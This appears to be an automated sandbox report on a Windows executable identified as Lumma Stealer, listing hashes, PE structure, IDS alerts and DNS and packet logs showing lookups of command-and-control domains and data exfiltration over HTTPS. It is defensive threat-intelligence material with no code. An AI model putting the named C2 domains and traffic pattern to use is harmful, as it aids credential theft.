                                  Bire1g8ahY.exe                malicious  LummaC, Stealc                                   172.67.157.254
steamcommunity.com                Ebgl8jb6CW.exe                malicious  LummaC                                           23.55.153.106
                                  35K4Py4lii.exe                malicious  LummaC                                           23.55.153.106
                                  BootStrapper.exe              malicious  LummaC                                           23.55.153.106
                                  Loader.exe                    malicious  LummaC                                           23.55.153.106
                                  Script.exe                    malicious  LummaC                                           23.55.153.106
                                  3zg6i6Zu1u.exe                malicious  LummaC                                           23.55.153.106
                                  oiF7u78bY2.exe                malicious  LummaC                                           23.55.153.106
                                  L5Kgf2Tvkc.exe                malicious  LummaC                                           23.55.153.106
                                  fkawMJ7FH8.exe                malicious  LummaC, Amadey, LummaC Stealer, RedLine, Stealc  104.121.10.34
                                  2ZsJ2iP8Q2.exe                malicious  LummaC                                           104.102.49.254
Match                             Associated Sample Name / URL  Detection  Threat Name                                      Context
AKAMAI-ASN1EU                     Ebgl8jb6CW.exe                malicious  LummaC                                           23.55.153.106
                                  35K4Py4lii.exe                malicious  LummaC                                           23.55.153.106
                                  BootStrapper.exe              malicious  LummaC                                           23.55.153.106
                                  Loader.exe                    malicious  LummaC                                           23.55.153.106
                                  Script.exe                    malicious  LummaC                                           23.55.153.106
                                  HVlonDQpuI.exe                malicious  Vidar                                            23.44.201.30
                                  armv7l.elf                    malicious  Mirai                                            2.18.19.83
                                  armv5l.elf                    malicious  Mirai                                            23.62.62.162
                                  PodcastsTries.exe             malicious  Vidar                                            23.209.72.39
                                  Canvas of Kings_N6xC-S2.exe   malicious  Unknown                                          184.85.182.130
CLOUDFLARENETUS                   0Pm0sadcCP.exe                malicious  LummaC, Amadey, LummaC Stealer, Stealc           104.21.11.101
                                  TTsfmr1RWm.exe                malicious  LummaC                                           104.21.11.101
                                  COBYmpzi7q.exe                malicious  LummaC                                           104.21.11.101
                                  rwFNJ4pHWG.exe                malicious  LummaC                                           172.67.165.185
                                  Ebgl8jb6CW.exe                malicious  LummaC                                           172.67.157.254
                                  lBsKTx65QC.exe                malicious  LummaC                                           104.21.11.101
                                  35K4Py4lii.exe                malicious  LummaC                                           104.21.66.86
                                  dEugughckk.exe                malicious  LummaC                                           172.67.165.185
                                  Solara-v3.0.exe               malicious  LummaC                                           172.67.165.185
                                  1C6ljtnwXP.exe                malicious  LummaC                                           104.21.80.215

Note: both ASNs are large CDN/edge networks, and the addresses listed here are shared edge IPs that also carry legitimate traffic (the same AKAMAI-ASN1EU range appears with Vidar and Mirai samples unrelated to this family). An overlap on ASN or IP alone is therefore a weak pivot; corroborate it with the domain and fingerprint matches in the adjacent tables before using it as an indicator.
Match                             Associated Sample Name / URL  Detection  Threat Name                                      Context
a0e9f5d64349fb13191bc781f81f42e1  0Pm0sadcCP.exe                malicious  LummaC, Amadey, LummaC Stealer, Stealc           172.67.157.254, 23.55.153.106
                                  TTsfmr1RWm.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  COBYmpzi7q.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  rwFNJ4pHWG.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  Ebgl8jb6CW.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  lBsKTx65QC.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  35K4Py4lii.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  dEugughckk.exe                malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  Solara-v3.0.exe               malicious  LummaC                                           172.67.157.254, 23.55.153.106
                                  BootStrapper.exe              malicious  LummaC                                           172.67.157.254, 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.554424798300179
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 6GNqkkKY0j.exe
File size: 2'894'848 bytes
MD5: 1778a174a471fdec99c35907f2267d30
SHA1: 4867feba972b8cab9eb49ce4421b88193bff2d0b
SHA256: eb58db1db82012e283903925b9f45c73ff3427ef522c853bc286ed9e395924a9
SHA512: a8ccb13ea18d12643d59507f98ea4947d92f9eb5faafca305ff9e01b371bf441821a297fc481a53f0ccb9eb541ec71d15663c9d76cdcd6397f6f68a877a0e60d
SSDEEP: 49152:sL+QJqanJUzeI7HK2yo619gKlXpohDddYxnOt16caym:w9g2JUzeI7HK2yo619HWldGxnOt16caV
TLSH: 7CD54A61F90972CFD88E97B49927CD835A6C43B9472804E3E95868FB7D63CC116B7C28
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..........................................@.......................... /......B,...@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6ef000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F0FE0D23E2Ah

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty name) | 0x1000 | 0x52000 | 0x26400 | 1025838d346ec9bdb57d8ea37193b242 | False | 0.9994510825163399 | data | 7.980471642795688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ubzvudki | 0x55000 | 0x299000 | 0x299000 | c5cd7cb596b1f92a3f15fffc23a3ca0f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
webyiwwz | 0x2ee000 | 0x1000 | 0x400 | c793e6b7c44e1f56f17e4dd65fc49719 | False | 0.7734375 | data | 6.028501120723357 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2ef000 | 0x3000 | 0x2200 | ed3a360cc77928189cb5dbd7843d8be3 | False | 0.09800091911764706 | DOS executable (COM) | 1.2159092109839251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
kernel32.dll | lstrcpy


                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                    2024-12-26T12:45:07.607341+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.5605951.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:07.748559+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.5524461.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:07.895129+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.5522151.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:08.042861+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.5507421.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:08.182814+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.5574561.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:08.327464+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.5597661.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:08.511094+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.5605161.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:08.672427+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.5549231.1.1.153UDP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:10.635190+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:11.455460+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:13.220468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:16.034199+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:16.034199+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:17.364608+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:37.418008+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:37.418008+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:45:39.157288+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549743172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:07.424139+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549743172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:09.245417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549809172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:38.126992+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549809172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:39.778813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549874172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:41.837953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549880172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:44.081164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549886172.67.157.254443TCP
                                                                                                                                                                                                                                                                    2024-12-26T12:46:45.403758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549888172.67.157.254443TCP
• Total Packets: 103
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.632632017 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.849850893 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.849900007 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.849967003 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.850395918 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:37.850408077 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.157032013 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.157288074 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.161556959 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.161571980 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.162054062 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.171382904 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.171526909 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:45:39.171713114 CET44349743172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.423809052 CET49743443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.644912004 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.644954920 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.645071030 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.645473957 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:07.645483971 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.245291948 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.245417118 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.248130083 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.248143911 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.248437881 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.250061035 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.250368118 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.250396967 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.250451088 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:09.250457048 CET44349809172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.126638889 CET49809443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.474375010 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.474440098 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.474735975 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.475182056 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:38.475198984 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.778678894 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.778812885 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.780608892 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.780642986 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.780899048 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.858920097 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.859034061 CET44349874172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:39.859112978 CET49874443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:40.486023903 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:40.486076117 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:40.486152887 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:40.517421961 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:40.517438889 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.837852955 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.837953091 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.839963913 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.839972019 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.840261936 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.841975927 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.842017889 CET44349880172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:41.842063904 CET49880443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:42.776834965 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:42.776899099 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:42.777033091 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:42.777431011 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:42.777446985 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.081068039 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.081163883 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.083007097 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.083017111 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.083250999 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.084486961 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.084525108 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.084577084 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.097642899 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.097702026 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.099092960 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.099363089 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:44.099381924 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.403676033 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.403758049 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.405503988 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.405514956 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.405757904 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.406975031 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.407013893 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.407149076 CET44349888172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.407205105 CET49888443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                    Dec 26, 2024 12:46:45.407221079 CET49888443192.168.2.5172.67.157.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 12:45:07.457397938 CET | 58981 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:07.602500916 CET | 53 | 58981 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:07.607341051 CET | 60595 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:07.745450020 CET | 53 | 60595 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:07.748558998 CET | 52446 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:07.891181946 CET | 53 | 52446 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:07.895128965 CET | 52215 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.033308983 CET | 53 | 52215 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.042860985 CET | 50742 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.180594921 CET | 53 | 50742 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.182813883 CET | 57456 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.325007915 CET | 53 | 57456 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.327464104 CET | 59766 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.466439962 CET | 53 | 59766 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.511094093 CET | 60516 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.649118900 CET | 53 | 60516 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.672426939 CET | 54923 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:08.809952974 CET | 53 | 54923 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:08.903105974 CET | 54612 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:09.125432014 CET | 53 | 54612 | 1.1.1.1 | 192.168.2.5
Dec 26, 2024 12:45:11.760556936 CET | 49280 | 53 | 192.168.2.5 | 1.1.1.1
Dec 26, 2024 12:45:11.901314974 CET | 53 | 49280 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 12:45:07.457397938 CET | 192.168.2.5 | 1.1.1.1 | 0xa925 | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:07.607341051 CET | 192.168.2.5 | 1.1.1.1 | 0x33d2 | Standard query (0) | wordyfindy.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:07.748558998 CET | 192.168.2.5 | 1.1.1.1 | 0x5dfe | Standard query (0) | slipperyloo.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:07.895128965 CET | 192.168.2.5 | 1.1.1.1 | 0x39e0 | Standard query (0) | manyrestro.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.042860985 CET | 192.168.2.5 | 1.1.1.1 | 0x601 | Standard query (0) | shapestickyr.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.182813883 CET | 192.168.2.5 | 1.1.1.1 | 0xf602 | Standard query (0) | talkynicer.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.327464104 CET | 192.168.2.5 | 1.1.1.1 | 0xf85a | Standard query (0) | curverpluch.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.511094093 CET | 192.168.2.5 | 1.1.1.1 | 0x5f96 | Standard query (0) | tentabatte.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.672426939 CET | 192.168.2.5 | 1.1.1.1 | 0x970e | Standard query (0) | bashfulacid.lat | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.903105974 CET | 192.168.2.5 | 1.1.1.1 | 0x3a89 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:11.760556936 CET | 192.168.2.5 | 1.1.1.1 | 0x9c99 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 12:45:07.602500916 CET | 1.1.1.1 | 192.168.2.5 | 0xa925 | Name error (3) | observerfry.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:07.745450020 CET | 1.1.1.1 | 192.168.2.5 | 0x33d2 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:07.891181946 CET | 1.1.1.1 | 192.168.2.5 | 0x5dfe | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.033308983 CET | 1.1.1.1 | 192.168.2.5 | 0x39e0 | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.180594921 CET | 1.1.1.1 | 192.168.2.5 | 0x601 | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.325007915 CET | 1.1.1.1 | 192.168.2.5 | 0xf602 | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.466439962 CET | 1.1.1.1 | 192.168.2.5 | 0xf85a | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.649118900 CET | 1.1.1.1 | 192.168.2.5 | 0x5f96 | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:08.809952974 CET | 1.1.1.1 | 192.168.2.5 | 0x970e | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:09.125432014 CET | 1.1.1.1 | 192.168.2.5 | 0x3a89 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:11.901314974 CET | 1.1.1.1 | 192.168.2.5 | 0x9c99 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:11.901314974 CET | 1.1.1.1 | 192.168.2.5 | 0x9c99 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
